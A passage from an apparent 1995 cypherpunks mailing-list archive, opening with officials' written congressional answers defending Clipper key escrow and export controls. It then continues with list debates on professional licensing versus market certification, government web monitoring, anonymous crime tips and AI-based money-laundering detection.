that law enforcement agencies could not listen to those communications. Just as legitimate businesses operate much more efficiently and effectively using the telecommunications system than they could without it, so will criminal enterprises be able to operate more efficiently and effectively if they no longer have to avoid using the telecommunications system. The United States is faced with a choice. We can sit back and watch as the emerging national information infrastructure becomes a valuable tool for criminals and terrorists to use to plan and carry out their activities with complete security, or we can take steps to maintain the current ability of government to conduct lawful wiretaps so that prudent criminals will have to find other less efficient ways to operate and foolish ones may be caught. Key escrow encryption is the later option. Q: Would widespread use of the Skipjack algorithm harm U.S. exports? Do you think it is unlikely foreign businesses will purchase American encryption technology if the U.S. Government holds a set of the decoding keys? Answer: I do not believe that widespread use of key escrow encryption in the United States will harm U.S. exports. If it has any effect at all, it could increase exports somewhat. Key escrow encryption products provide another option for foreign purchasers that they have not had in the past; to the extent that foreigners doe purchase key escrow encryption products, it will mean an increase in exports. Meanwhile, U.S. exporters are free to continue to sell the products they currently sell in foreign markets and to seek license approvals for new products. It is difficult to predict the foreign market for U.S. key escrow encryption technology. Businesses that fear U.S. Government interception of their communications presumably would avoid products for which the U.S. Government hold keys. However, there are a number of reasons why foreign businesses might purchase them. One major reason would be to communicate securely with U.S. businesses that use them. In addition, the superior level of security provided by key escrow products (against all but lawful U.S. Government access) may make them attractive to foreign business that do not view U.S Government access as a major concern. While some prospective users abroad may steer clear of key escrow products because the United States will retain access, there may be many who believe they are unlikely to be targeted by U.S. intelligence in any case or for whom the superior security offered by key escrow encryption products against threats of greater concern may make key escrow products an attractive option. For example, a distributor of pay-TV programming may depend on encryption to ensure that only those viewers who pay for the service can decrypt the TV signal. Such a distributor probably would not be concerned about the threat of access by the United States Government, and might favor suitable key escrow encryption products over competing products that use weaker encryption algorithms. Q: You were present when the previous panelist, Stephen Walker, described how present U.S. laws prohibit his company from exporting encryption products. As I understand it, Senator Murray's bill S.1846, attempts to relax these export controls somewhat. Please give us your views on this legislation. Answer: I support the Administration's position, as announced by the White House on February 4, that current export controls must remain in place and that regulatory changes should be implemented to speed exports and reduce the licensing burden on exporters. The bill you reference appears to be inconsistent with the Administration position. I would be happy to provide you further information on the Administration's reasons for maintaining the current export controls in an appropriate setting. *Questions from Senator Murray: Q: In my office in the Hart building this February, I downloaded from the Internet an Austrian program that uses DES encryption. This was on a laptop computer, using a modem over a phone line. The Software Publishers' Association says there are at least 120 DES or comparable programs world wide. However, U.S. export control laws prohibit American exporters from selling comparable DES programs abroad. With at least 20 million people hooked up to the Internet, how do U.S. export controls actually prevent criminals, terrorists, or whoever from obtaining DES encryption software? Answer: Serious users of encryption do not entrust their security to software distributed via networks o bulletin boards. There is simply too much risk that viruses, Trojan Horses, programming errors, and other security flaws may exist in such software which could not be detected by the user. Serious users of encryption, those who depend on encryption to protect valuable data and cannot afford to take such chances, instead turn to other sources in which they can have greater confidence. Such serious users include not only entitles which may threaten U.S. national security interests, but also businesses and other major consumers of encryption products. Encryption software distribution via Internet, bulletin board, or modem does not undermine the effectiveness of encryption export controls. [Primary written questions for Admiral McConnell] 1. The Defense Authorization Bill for Fiscal Year 1994 has authorized $800,000 to be spent by the National Research Council of the National Academy of Sciences to conduct a study of federal encryption policy. Can we wait to implement the key escrow encryption program until we have the benefit of the NRC's study? Do you think this study is necessary? Should this study be expedited? Answer: We do not believe that we can wait until after the NRC study is completed in 1996 to begin implementation of the key escrow initiative. The information technology industry is dynamic and fast-moving, and to wait another two years or more would, we believe, jeopardize the success of the initiative. Industry demand for encryption products is growing, and the technology is available now to meet that demand with encryption products that provide an outstanding level of security to the user conduct lawful wiretaps. To wait for the completion of the NRC study to other encryption products which would defeat lawful wiretaps. We believe that such a delay would not be in the best interest of the American people. Neither do we believe that the study should be expedited. For our part, we will carefully consider the conclusions of the NRC study. We expect that it will give very careful consideration to the issues, and we would not want the pressure of an unnecessarily short deadline to limit the study group's ability to produce the best report possible. 2. The Administration has said that it is continuing to restrict export of the most sophisticated encryption devices, in part, "because of the concerns of our allies who fear that strong encryption technology would inhibit their law enforcement capabilities." Do we really need to help our allies by prohibiting the export of strong American encryption products, since those same countries can simply control the encryption bought within their borders? Answer: Exports of encryption products are subject to review primarily to protect U.S. national interests, including national security, law enforcement, foreign policy, and other important interests. The law enforcement concerns of our allies are a consideration, especially as the ability of our allies to combat terrorism, drug trafficking, and other international law enforcement problems can have direct benefits to the United States. However, foreign law enforcement concerns do not drive our export control policy. We would continue to review encryption exports to protect U.S. national interests even if foreign law enforcement concerns disappeared. 3. Do you know whether foreign governments would be interested in importing key escrow encryption products to which they hold the decoding keys? Answer: Several foreign governments have expressed interest in key escrow encryption technology due to their own law enforcement concerns. There have been some preliminary discussions, but issues such as who would hold the escrowed keys and the circumstances of government access to escrowed keys must be fully vetted. 4. The Government wants the key escrow encryption standard to become the de facto industry standard in the United States. Would the Government abandon the Clipper Chip program if it is shown to be unsuccessful beyond government use? Answer: We do not expect the program to be unsuccessful beyond government. We have developed a sound security product that we expect will find many uses in government information systems and further believe that government use will bring with it a commercial market, particularly in the defense sector. We have developed a sound security product that we expect will find many uses in government information systems regardless of its success in commercial markets. 5. Openly available devices, such as Intel-compatible microprocessors, have seen dramatic gains, but only because everyone was free to try to build a better version. Given the restrictions on who can build devices with the classified skipjack algorithm, how will key escrow chips keep up with advances in semiconductor speed, power, capacity and integration? Answer: Despite the requirements that a firm must meet to produce key escrow encryption chips, we expect that there will be a number of manufacturers competing against each other to produce the best product, and that such competition will drive them to keep up with the latest technological advances. It is worth noting that only a few companies can produce the sophisticated microprocessors you reference, yet the competition in that market has driven them to achieve remarkable advances in that technology. NSA's STU-III secure telephone program provides an example of a cryptographic product line that keeps pace with technology. The presence of a classified algorithm does not preclude keeping pace with technology. Through NSA's use of a competitive, multi-vendor approach, STU-III secure telephone products have continued to evolve in response to user requirements and technological advances despite their use of a classified encryption algorithm and the consequent need for security restrictions on the manufacturers. 6. How well does the Skipjack algorithm work on telecommunications operating at very high speeds. Is NSA working on another algorithm, called BATON, that could be used in high speeds with a key escrow system? Will Capstone be compatible with BATON? Answer: Using currently available microelectronics technology the SKIPJACK algorithm could not be used for encryption at very high speeds. BATON is the name of an algorithm developed by NSA that could be used at higher rates of speed. We have no plans to develop key escrow encryption devices using BATON, however. Instead, we are considering another algorithm for use at high speeds with a key escrow system. A high-speed key escrow device based on an algorithm other than SKIPJACK would not be "compatible with Capstone" in the sense that traffic encrypted by such a device could not be decrypted by Capstone, and vice versa. However, since such a device would be used for much higher-speed applications than those for which Capstone was designed, there would be no need for it to be compatible with Capstone in that sense. 7. Can Capstone be used to encrypt video programming? If so, have cable companies been approached by any government agency to use Capstone to scramble or encrypt cable program? Answer: Capstone could be used to encrypt any digital signal, including video programming, operating at up to about 10 million bits per second. It could be used for encrypting individual video channels but not for bulk encryption of many channels multiplexed together in a single link. NSA is not aware of any government agency approaching cable companies to urge the use of Capstone. Two manufacturers have asked us about the suitability of key escrow devices for this purpose, however. 8. Encryption software is available that can be used with Clipper to encypt a message before after it has been encrypted with Clipper. This "double encrypting" risks bypassing the key escrow feature. If a sender first encrypts the message with software using DES, and then transmits the message "double encrypted" with Clipper, can tell you from looking at the cipher, or encrypted text, that the underlying message was encrypted? Answer: The only way to tell that a message has been "double encrypted" in this way would be to decrypt the "outer layer" of encryption, i.e. that done with Clipper. Only then would one be able to tell that the message had first been encrypted with something else. ---------- From dsc at swcp.com Wed Sep 13 21:26:13 1995 From: dsc at swcp.com (Dar Scott) Date: Wed, 13 Sep 95 21:26:13 PDT Subject: cryptography eliminates lawyers? Message-ID: Black Unicorn wrote, >On Wed, 13 Sep 1995, Dar Scott wrote: > >> Black Unicorn wrote, [snip} We seem to be having problems with the meanings of words. For example, I make a distinction between certification and licensing. Also, I see violence and coercion as being ultimately related to something physical. I'm not sure what "proper", "competent to practice"... mean. And I see a big difference in a market based monopoly and a government based monopoly. [snip] >Didn't I just say this above? > >A centralized, or several centralized authorities. I had assumed you meant by authority an agent of the state that is able to envoke or otherwise wield the physical force of the state. By a certifying entities I was refering to private organizations that had no similar power or to government organizations that had only the power to provide information. By a licensing entity I was refering to an organization that can coerce to prevent the unlicensed from doing the licensed behavior. By coercion I meant the threat of physical force or the force itself. Though one might think of physical force as applying to murder, kidnapping, slavery, assault, robbery, physical theft, I would also apply it to theft or damage of abstract property that has properties like physical property. I intend for these to apply to many actions of the state. Perhaps I erred in applying "certification" and "license" to these contrasting concepts, but I do think the distinction is important and the observation that there are fuzzy areas in between does not remove that. If I have a license from the local gang to sell drugs and the guy across the street does not, I could encourage the gang to do something and the guy might get shot. Similarly, if I was a PE and my competitor across the street was not, I could encourage the state to do something that--with several stages of his lack of cooperation--results in his finding a gun in his face or worse. >I guess the center of my question is, how can you apply Web of Trust to >e.g. a university degree. Who cares what Bob and Alice think my degree >is in, the client only wants to know from the institution. It does not matter why people would trust a certifying entity. It might have a great earned reputation, it might "borrow" some reputation from bonding or audits, or it might have ties to the Real World. > Licensing can only be done by an >> entity that can use physical force to prevent >> buying and selling legal services. > >I believe you are incorrect, but I guess my main concern is your >characterization of "Physical force." I am assuming you mean coercion, >and not that you will be jailed or such (though this may be the case). > >I would argue that as long as coercion exists (violence of any type, >physical or not) you have a licensing authority. Take the hollywood >blacklist. No one actually pushed around suspected pinko screenwriters >(well, at least, if anyone did, it was incendential) but they certainly >faced a great deal of persuasive motivation. Look at the committee as >the licensing authority here. (Licensing you as a non-communist as it were). It seems I am using coercion in a different sense. Unless blacklisting has physical force at its root enforcement mechanism it is not coercion and is very fragile. >If several governmental and private authorities were in the practice of >certifing that Bob has a law degree from Tremont University, and that he >is competent to practice in D.C., and given that the citizens of D.C. >will look for these credentials, isn't this a license? Afterall, Bob has >to pass some test or requirement to get the signatures. Isn't this >coercion in your definition? No. I apologize for any confusion. >Can't the multiple authorities set common >or near common guidelines? Rather, don't they HAVE to in order to have >their signatures worth the electrons they are transmitted with? In general, No. Under many conditions market forces make services alike, but more often competing businesses find particular market niches. I would expect that different certs would cover different levels of expertise, different specializations and different breadths of specializations. Any lawyer might have a dozen certs. I would not expect there to be a single level of certification for all applications. I know of several companies in which the primary product designer has no engineering degree. >If you take the exteme position you seem to, there's an antitrust case here. I don't insist there has to be a variety. I only desire that coercion does not come into play in preventing it. As I said, if a natural monopoly forms at times, I am not worried. >Am I not "licensing" my key signature to people provided they pass my key >signature criteria? Am I not doing violence by withholding my signature >and the benefits it might convey for certain "terms?" [snip] >This is the trap of the licensing argument. I see a big difference in withholding a signature and sending gunmen. There is no violence in withholding a signature. >The evil is not licensing, which I think serves a real purpose, but >created convenience fees, taxation through the withholding of licensing >and the use of other government largess. I wrote a massive piece on this >and sent it to the list about a year and a half ago. With interest I will >repost it. Even if no one else is interested, I'd like to see it. >The real question is how you decide what an authority to license is. Is >it to be dictated by government? Or by market forces (i.e. the >reputation of the licenser). Yes, the government vs. market question is key, but I believe the answer is in that distinction I used in contrasting terms "certification" and "license". The "who" is tied up in what the instrument is. >> >I don't see how the net will eliminate the basic need for highly >> >qualified professionals and the proof that they have credentials. >> >> It won't. The needs might shift a little but they >> will be there. > >Then why will lawyers, or a 'professional monopoly' be broken? The meaning of "qualified professional" and "credentials" will be market-based and multidimensional, not defined by the state or a group already "qualified" using the state for enforcement. [snip] Concerning a market-based monopoly, >> Not so bad if it happens, >> but much more honest, efficient and softer-edged >> than "licensed to practice". > >I'm not so sure. There will be a tremendous amount of corporate power in >these authorities, and if (as you seem to be saying a few paragraphs up) it >is hard to break into the trusted certification business, there is a >monopoly again. I don't really think this is a problem. It is the force-based monopoly and specifically the government-based monopoly I have a problem with. [snip] >Like the several state Bars? The market advantage is slight. [snip] >So you have estentially admitted that a central authority is required? >Or will be more often used? Not required. [snip] >If your defintion of license is simply who does the coercing, I think you >should reconsider. What ever the word used, I see the distinction between 1) the assertion of certain information and 2) the threat of force as being key. Perhaps, I could have use the phrases "non-coercion-based" licensing and "coercion-based" licensing, but I am not comfortable with these--trade licensing invokes too violent of an image. A note to all in government licensed trades: I recognize that licensing is part of the real world we live in. Often one has to be licensed to practice a favorite trade. I do not mean to describe the licensed themselves as violent. Dar =========================================================== Dar Scott Home phone: +1 505 299 9497 Dar Scott Consulting Voice: +1 505 299 5790 8637 Horacio Place NE Email: darscott at aol.com Albuquerque, NM 87111 dsc at swcp.com Fax: +1 505 898 6525 http://www.swcp.com/~correspo/DSC/DarScott.html =========================================================== From damion.furi at the-matrix.com Wed Sep 13 21:28:40 1995 From: damion.furi at the-matrix.com (DAMION FURI) Date: Wed, 13 Sep 95 21:28:40 PDT Subject: (NOISE) Re: White House M In-Reply-To: <8B1023A.000504FC46.uuout@the-matrix.com> Message-ID: <8B10562.000504FFB4.uuout@the-matrix.com> |> Maybe so, but we don't have to like it. And I don't. But |> it's not so much their access, per se, that I object to. F|Why the hell do you care ? Someone has a home page for something on the Web. |Someone at the White House looks at it. So what ? You object to the fact |that somebody in the government has a Web browser and *gasp* uses it to read |stuff on the WWW ??? What did I just write? It's not so much their access... |> It's their potential intentions, F|You take moral offense to what you think someone else _might_ be thinking ? Not normally, no. But I've found a number of reasons to take offense at more overt government actions, and I see no reason not to take offense at obscure government actions. Especially when it involves spooks (NSA, DOD, military branch agencies, CIA, FBI, DEA, alphabet soup agency of choice). |Sounds like you believe in thoughtcrime. Banned any good books lately ? I _DO_ believe in thoughtcrime. I think it's a goddamned crime when some dickhead with more power than sense attempts to limit the actions of private citizens, in complete disregard for the idea of "presumed innocent until proven guilty." If someone so much as THINKS this, I have a problem with them. Now, go fuck yourself. F|> all things considered, and |> the fact that they aren't at all open about such monitoring. F|This is absurd. You expect the White House to issue a press release every tim |a staffer clicks on a URL ? No. I want to know what they're monitoring on a general basis and why. It's my tax money, too. But they aren't open about the monitoring. Half the time they deny doing it at all, and the rest of the time they come up with a few dozen specious excuses. furi at the-matrix.com pgp-public-key at demon.co.uk C1225CE1 RADical 1 Systems - Multi-Platform Custom Programming, Service, & Support From tfs at vampire.science.gmu.edu Wed Sep 13 22:17:21 1995 From: tfs at vampire.science.gmu.edu (Tim Scanlon) Date: Wed, 13 Sep 95 22:17:21 PDT Subject: Whitehouse "dissident" web site monitoring? In-Reply-To: <9509130255.AA03446@sulphur.osf.org> Message-ID: <9509140517.AA01328@vampire.science.gmu.edu> I know a few folks at eop, and I can tell you that it's a tad bigger setup that a few boxes in bill's private office. This is the "office" of the executive, not "the executive office". There's a good amount of people who work there. Most of them are good folks too. They are not power hungry nuts, they are not bad clones of "The Monroes", they are not weirdos like "Cancer Man" out of the X-Files, in fact, in many cases they are just real normal people who belive in trying to do something for their fellow citizens. They don't *do* partisan politics, and in fact, partisan politics are the greatest source of fear for their job security. I've watched allot of *good* people, by ANYONES standards, leave their jobs in the government lately due to the lack of support they have gotten from the congress & the executive branch, and I know how bad morale is in places where everyone would be better served if people didn't have to worry about how to feed the kids next month. Don't get me wrong, I don't agree with allot of *political* stuff that's going on at all. But the idea of some poor sod worrying about his job becasue he decided to check out a web site with "controversial" material is enough to make me vomit. Attributing a conspiracy to this is just plain and simple ignorance. Any agency worth much wouldn't "monitor" from a site with a big 'ol .gov at the end of the IP. THEY arn't that stupid, but apperently the whackos in the woodpile think that people would be that dumb. Personaly I'd be flattered if some gov site were looking at "dissident" material I put up, if I chose to do that, God knows it might actually mean my elected representatives were listening, or at least their staff might be. I swear, Clinton "scandals" make me nostalgic for the 'ol republican days when we had REAL scandals like Watergate & Iran-Contra... All this Foster crap & black helicopters just strikes me as goofy, and in some cases ignorantly obnoxious. I guess this is what happens when the trailer park crowd get's on the net... Tim ________________________________________________________________ tfs at vampire.science.gmu.edu (NeXTmail, MIME) Tim Scanlon George Mason University (PGP key avail.) Public Affairs I speak for myself, but often claim demonic possession From fstuart at vetmed.auburn.edu Wed Sep 13 23:36:59 1995 From: fstuart at vetmed.auburn.edu (Frank Stuart) Date: Wed, 13 Sep 95 23:36:59 PDT Subject: An opportunity not to be missed Message-ID: <199509140636.BAA08330@snoopy.vetmed.auburn.edu> >It has occurred to me with the approach of the presidential campaign >in the US (and its attendant press frenzy), that there is an an >unprecedentedly vast opportunity to bring certain items on the >cypherpunk platform into the public spotlight. [...] > Candidate Posturing Required Spin > ----------------------------------------------------------------- > Pro-business, tough on crime anonymous crime tip e-mail > a la Fed whistleblower stuff, > and the SPA [...] Now that you mention it, it seems to me that completely anonymous tipsters with the ability to receive ecash rewards would likely be a bigger boon to law enforcement types than would easily tappable communications lines. Is anyone in a position to set up a cypherpunks CrimeStoppers mailbox (for use through the remailers)? You could set up a web-page with instructions and a list of crimes for which there are rewards. Perhaps some civic organiztions would be willing to donate money for tips leading to arrests and convictions of any crimes. Even if it doesn't catch any bad guys, it'd be great PR for strong crypto, anonymity, ecash and whoever runs it. | (Douglas) Hofstadter's Law: Frank Stuart | It always takes longer than you expect, even fstuart at vetmed.auburn.edu | when you take into account Hofstadter's Law. From frissell at panix.com Thu Sep 14 02:26:05 1995 From: frissell at panix.com (Duncan Frissell) Date: Thu, 14 Sep 95 02:26:05 PDT Subject: AOL Porno Message-ID: Will the federal prosecutors and Fibbies on this list please emphasize that the Internet was not involved in the AOL kiddie porn case. The Internet has enough opportunities for bad publicity as it is. DCF "Who wonders: How it is that CompuServe was able to exist from 1979 to the arrival of Prodigy and AOL without major sex, and drugs, and rock and roll problems?" From madden at mpi-sb.mpg.de Thu Sep 14 02:58:03 1995 From: madden at mpi-sb.mpg.de (Peter Madden) Date: Thu, 14 Sep 95 02:58:03 PDT Subject: Software vs Money Laundering In-Reply-To: Message-ID: <9509140957.AA03082@mpii02024.ag2.mpi-sb.mpg.de> Duncan Frissell's email (Sep 13 17:52:55), in reply to John Young, gives some problems regarding an AI screening program for detecting illicit electronic money transfers: > Not the least of which [problems] is that money launderers can use "AI > Software" to generate a stream of real and dummy money transfers that > emulates "normal" money transfers. Not to mention the fact that > monopoly money transfer networks that can be surveilled by the Feds > (FEDWIRE and SWIFT) are not long for this world. They will be > replaced by encrypted, open, net-based systems. There are also more basic problems. An essential initial stage in the development of such AI programs, a kind of expert system, is the analysis of the behaviour of the human "experts". In this case the experts being the willy money launderers. The program can then, aledgedly, spot all those trademark traits of the money launderer and nab him/her. Trouble is, the program therefore represents a kind of blue-print of what the aspiring money launder should *not* to do when making illicit electronic money transfers. Any "expert system" that operates by recognizing, and acting upon, human behaviour (regardless of whether or not that be on the net) can be foiled by altering, or disguising, that behaviour (the "dummy money transfers" mentioned by DCF would be one way of duping the system). Of course, the officials at law will claim rousing successes and cite numerous convictions -- but as with the drug trade, that will only be the tip of the ice-berg with no real clues as to the size of the base. The tip of the ice-berg will simply be what the AI program has succeeded in formally "capturing". Pete ================================================================= Dr Peter Madden, Email: madden at mpi-sb.mpg.de Max-Planck-Institut fuer Informatik, Phone: (49) (681) 302-5434 Im Stadtwald, W-66123 Saarbruecken, Germany. Fax: (49) (681) 302-5401 From frissell at panix.com Thu Sep 14 03:01:28 1995 From: frissell at panix.com (Duncan Frissell) Date: Thu, 14 Sep 95 03:01:28 PDT Subject: cryptography eliminates lawyers? In-Reply-To: Message-ID: On Wed, 13 Sep 1995, Black Unicorn wrote: > But won't clients insist on proper credentials in one form or another? > Doesn't the practicality and accountability of a centralized authority > (or several authorities) provide the best answer to this? Who is going > to accept my signature promising that I did indeed get a law degree and > pass the bar? An educational institution can certify its own graduates --- it does now. Competing credentialing institutions is exactly what I would be looking for as opposed to today's coercive monoply. No matter how skilled, it is illegal for an unlicensed person to practice law, medicine, or many other professions in any state. The nets weaken these restrictions because they allow action at a distance. Note the other effects of the nets. They make it hard to tell that you *are* working which reduces the impact of regulations of work by "illegal aliens." Thus if I am wandering through the South of France while writing the 'Great American Novel' I am unlikely to get busted for violation of work restrictions. The nets expand the number of jobs I can do while innocently wandering the South of France. I can or will soon be able, for example, to manage a large international corporation from anywhere. DCF "Who actually prefers Le Massif Central to those hot and crowded southern climes." From unicorn at polaris.mindport.net Thu Sep 14 03:21:13 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Thu, 14 Sep 95 03:21:13 PDT Subject: cryptography eliminates lawyers? In-Reply-To: Message-ID: On Wed, 13 Sep 1995, Dar Scott wrote: > Black Unicorn wrote, > >On Wed, 13 Sep 1995, Dar Scott wrote: > > > >> Black Unicorn wrote, > [snip} > > We seem to be having problems with the meanings of words. For example, I > make a distinction between certification and licensing. Which, as I have indicated, I see as a "distinction without a difference." > Also, I see > violence and coercion as being ultimately related to something physical. > So you wouldn't consider the Hollywood blacklist coercive? What about revocation of tax free status? I could go on for hours of examples how one can be hurt without a physical element. > I'm not sure what "proper", "competent to practice"... mean. In the context I was using them, they mean whatever the licenser (certifying authority if you prefer) says they mean- this is part of the point. > And I see a > big difference in a market based monopoly and a government based monopoly. > Which, I think, is your key error- particularly in the context of this licensing issue, where the difference is nearly invisible. > [snip] > >Didn't I just say this above? > > > >A centralized, or several centralized authorities. > > I had assumed you meant by authority an agent of the state that is able to > envoke or otherwise wield the physical force of the state. I think your hangup is one of overdemonizing the state to the point where no other evils seem to exist. By a certifying > entities I was refering to private organizations that had no similar power > or to government organizations that had only the power to provide > information. Like TRW. Would you argue there is no coercive power in this entity? Yet they are not affiliated with government. > By a licensing entity I was refering to an organization that can coerce to > prevent the unlicensed from doing the licensed behavior. By coercion I > meant the threat of physical force or the force itself. And as I indicated before, one need not threaten violence to coerce. I will point to the TRW example again. Though one might > think of physical force as applying to murder, kidnapping, slavery, > assault, robbery, physical theft, I would also apply it to theft or damage > of abstract property that has properties like physical property. I intend > for these to apply to many actions of the state. I think you have failed to apply them to other organizations. Again, I think you are over amoured with hating "the state." Many organizations not affiliated with government do violence to abstract properties. > Perhaps I erred in applying "certification" and "license" to these > contrasting concepts, but I do think the distinction is important and the > observation that there are fuzzy areas in between does not remove that. > > If I have a license from the local gang to sell drugs and the guy across > the street does not, I could encourage the gang to do something and the guy > might get shot. Similarly, if I was a PE and my competitor across the > street was not, I could encourage the state to do something that--with > several stages of his lack of cooperation--results in his finding a gun in > his face or worse. If I am a producer in a horizontal territory limitation agreement for sales of wigets, and bob is not, bob's attempt to move into my area and sell widgets will be met with a boycott by all the members of my agreement. Is this any less coercion? I understand the violence is fairly dramatic coercion, but it is hardly the only coercion. Do you not consider the Clipper program coercion? I suggest you take a look at Nozick, Coercion, in Philisophy, Science and Method (S. Morgenbessed ed. 1969) or Zimmerman, Coervice Wage Offers, 10 Phil & Pub. Aff. 121 (1981) Also, see Kreimer, Allocational Sanctions: The Problem of Negative Rights in a Positive State, 132 U. Pa. L. Rev. 1293 (1984). Personally I think Justice Stone had it correct with "Threat of loss, not hope of gain, is the essence of economic coercion." You might also take a look at the Yale Law Review article by Reich: (73 Yale 7 I think) > >I guess the center of my question is, how can you apply Web of Trust to > >e.g. a university degree. Who cares what Bob and Alice think my degree > >is in, the client only wants to know from the institution. > > It does not matter why people would trust a certifying entity. It might > have a great earned reputation, it might "borrow" some reputation from > bonding or audits, or it might have ties to the Real World. Exactly, it must be tied to some kind of authority. In this case, the issuing institution is about the only acceptable one. I stand by the contention that a University degree cannot be certified acceptably by an authority not in some way connected to the University. > > Licensing can only be done by an > >> entity that can use physical force to prevent > >> buying and selling legal services. > > > >I believe you are incorrect, but I guess my main concern is your > >characterization of "Physical force." I am assuming you mean coercion, > >and not that you will be jailed or such (though this may be the case). > > > >I would argue that as long as coercion exists (violence of any type, > >physical or not) you have a licensing authority. Take the hollywood > >blacklist. No one actually pushed around suspected pinko screenwriters > >(well, at least, if anyone did, it was incendential) but they certainly > >faced a great deal of persuasive motivation. Look at the committee as > >the licensing authority here. (Licensing you as a non-communist as it were). > > It seems I am using coercion in a different sense. Unless blacklisting has > physical force at its root enforcement mechanism it is not coercion and is > very fragile. You are using coercion in a different sense. One of the definitions I get in Webster's (while force is incorporated in some others) is "to compel to do something by the use of power, intimidation or threats." If you perfer that I use "serious persuasion" instead, fine, but I think you are just splitting hairs. > >If several governmental and private authorities were in the practice of > >certifing that Bob has a law degree from Tremont University, and that he > >is competent to practice in D.C., and given that the citizens of D.C. > >will look for these credentials, isn't this a license? Afterall, Bob has > >to pass some test or requirement to get the signatures. Isn't this > >coercion in your definition? > > No. I apologize for any confusion. You needn't apologize, but I must admit, this looks a lot like coercion to me, as well as to Reich, and several justices of the Supreme Court. Do you believe it impossible/insignificant to manipulate behavior by persuasive means other than violence or the threat of actual physical violence? > >Can't the multiple authorities set common > >or near common guidelines? Rather, don't they HAVE to in order to have > >their signatures worth the electrons they are transmitted with? > > In general, No. Under many conditions market forces make services alike, > but more often competing businesses find particular market niches. An example please? With specific regard to certifing authorities and university degrees? I would > expect that different certs would cover different levels of expertise, > different specializations and different breadths of specializations. Any > lawyer might have a dozen certs. I would not expect there to be a single > level of certification for all applications. I know of several companies > in which the primary product designer has no engineering degree. But certainly all lawyers must have some base level of certification, even if this is only market enforced? i.e. no one would accept a lawyer with NO certification (or few enough people to make it impossible to be one with some certification) this being so, the withholding of the required certification is still co- er... persuasion, no? > >If you take the exteme position you seem to, there's an antitrust case here. > I don't insist there has to be a variety. I only desire that coercion does > not come into play in preventing it. As I said, if a natural monopoly > forms at times, I am not worried. I still am having trouble understanding your definition of coercion. > > >Am I not "licensing" my key signature to people provided they pass my key > >signature criteria? Am I not doing violence by withholding my signature > >and the benefits it might convey for certain "terms?" > [snip] > >This is the trap of the licensing argument. > > I see a big difference in withholding a signature and sending gunmen. > There is no violence in withholding a signature. There is no PHYSICAL violence, this I have admitted, but the economic violence of such an act can be significant. It seems that for you the distinction is in the emotional effect of the application of persuasive force, rather than the effect. I've given this example before. We take two convicted carjackers. The first we sentence to 5 years, but after 4 years and 50 weeks, tell him that we are going to extend the sentence another 10 years unless he takes an experimental vaccine. The second we sentence to 15 years, and after 4 years and 50 weeks, we tell this one that we will cut off 10 years from the sentence if he takes the experimental vaccine. What's the difference? Both have been given two choices 1> Spend 15 years, no vaccine. 2> Spend 5 years, take vaccine. The point is that the first is emotionally more stacked, you feel sorry for the carjacker (well, maybe I should have picked crypto exporter) because he has been tricked. When asked, 90% respond that the first is more "unfair." Allowing emotion to cloud one's judgement of what is and is no coercive is a mistake. > >The evil is not licensing, which I think serves a real purpose, but > >created convenience fees, taxation through the withholding of licensing > >and the use of other government largess. I wrote a massive piece on this > >and sent it to the list about a year and a half ago. With interest I will > >repost it. > > Even if no one else is interested, I'd like to see it. Let me dig it up. Absent another public request I will send it in E-Mail only. > >The real question is how you decide what an authority to license is. Is > >it to be dictated by government? Or by market forces (i.e. the > >reputation of the licenser). > > Yes, the government vs. market question is key, but I believe the answer is > in that distinction I used in contrasting terms "certification" and > "license". The "who" is tied up in what the instrument is. I believe that your defining the words merely to distinguish who the certifing authority is confusing- and deceptive. > >> >I don't see how the net will eliminate the basic need for highly > >> >qualified professionals and the proof that they have credentials. > >> > >> It won't. The needs might shift a little but they > >> will be there. > > > >Then why will lawyers, or a 'professional monopoly' be broken? > The meaning of "qualified professional" and "credentials" will be > market-based and multidimensional, not defined by the state or a group > already "qualified" using the state for enforcement. I still think you are mistaken in that I feel you are ignoring the fact that no market exists below a certain certification level, regardless of how diverse the certifiers are. You also still miss that credentials for attorneies are already multidimensional. [market monopolies are "softer" than government ones.] > >these authorities, and if (as you seem to be saying a few paragraphs up) it > >is hard to break into the trusted certification business, there is a > >monopoly again. > I don't really think this is a problem. It is the force-based monopoly and > specifically the government-based monopoly I have a problem with. I will point to the oil companies in the industrial age, as well as the railroads. Certainly the potential for violence is not limited to government. I hate this example, but in this particular case I think you are missing its context. > [snip] > >Like the several state Bars? > The market advantage is slight. I'm not sure I follow you here. > [snip] > >So you have estentially admitted that a central authority is required? > >Or will be more often used? > Not required. Then how do you explain the points I have brought up. The base requirement of a certification from an education institution (for which you have provided no substitute). The existance of a floor, below which it is impractical to practice a profession and the existance of a set of entities (of whatever number) who's signatures are required to transcend this floor. > [snip] > >If your defintion of license is simply who does the coercing, I think you > >should reconsider. > > What ever the word used, I see the distinction between 1) the assertion of > certain information and 2) the threat of force as being key. > > Perhaps, I could have use the phrases "non-coercion-based" licensing and > "coercion-based" licensing, but I am not comfortable with these--trade > licensing invokes too violent of an image. I think this construction is still flawed. I will remain by my position that licensing is useful when not used to collect taxes or otherwise overregulate. I also hold that the distinctions you make between licensing and certification are without functional difference in effect and are deceptive in that they suggest a significant difference in effect or purpose where there is none. > A note to all in government licensed trades: I recognize that licensing is > part of the real world we live in. Often one has to be licensed to > practice a favorite trade. I do not mean to describe the licensed > themselves as violent. Thanks. > Dar > > > =========================================================== > Dar Scott Home phone: +1 505 299 9497 > > Dar Scott Consulting Voice: +1 505 299 5790 > 8637 Horacio Place NE Email: darscott at aol.com > Albuquerque, NM 87111 dsc at swcp.com > Fax: +1 505 898 6525 > http://www.swcp.com/~correspo/DSC/DarScott.html > =========================================================== > > > From unicorn at polaris.mindport.net Thu Sep 14 03:33:03 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Thu, 14 Sep 95 03:33:03 PDT Subject: cryptography eliminates lawyers? In-Reply-To: Message-ID: On Thu, 14 Sep 1995, Duncan Frissell wrote: > > > On Wed, 13 Sep 1995, Black Unicorn wrote: > > > But won't clients insist on proper credentials in one form or another? > > Doesn't the practicality and accountability of a centralized authority > > (or several authorities) provide the best answer to this? Who is going > > to accept my signature promising that I did indeed get a law degree and > > pass the bar? > > An educational institution can certify its own graduates --- it does > now. Competing credentialing institutions is exactly what I would be > looking for as opposed to today's coercive monoply. Yes, in the context of competing credentialing institutions I agree, but even now there is a base certification for such institutions (accreditation) which is delved out by a central authority, or common standards. What the other writer's approach missed was that one could not, in the end, do away with the basic requirement for some kind of standardization, even if it was market driven. While I too prefer the market approach, I still contend that a floor of credentials will exist, and indeed, should exist. > > No matter how skilled, it is illegal for an unlicensed person to practice > 